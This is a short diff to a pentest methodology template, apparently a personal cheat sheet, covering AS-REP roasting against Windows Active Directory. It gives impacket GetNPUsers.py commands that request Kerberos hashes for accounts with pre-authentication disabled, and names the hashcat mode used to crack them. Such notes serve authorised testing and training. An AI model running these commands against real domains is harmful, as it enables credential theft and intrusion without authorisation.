benrau87/doubletap/templates/windows-template.md

 Accounts but no pass
 Note: this only works is pre-auth is disabled
 1) Add the domain name to /etc/hosts
-2) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py DOMAIN/ -no-pass -usersfile users.txt
+2) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py DOMAIN/ -dc-ip INSERTIPADDRESS -no-pass -usersfile users.txt
-3) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py DOMAIN/USER -no-pass
+3) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py DOMAIN/USER -dc-ip INSERTIPADDRESS -no-pass
 Note: these hashes will be in -m 18200 (Kerberos 5 AS-REP etype 23) in hashcat

 Accounts and pass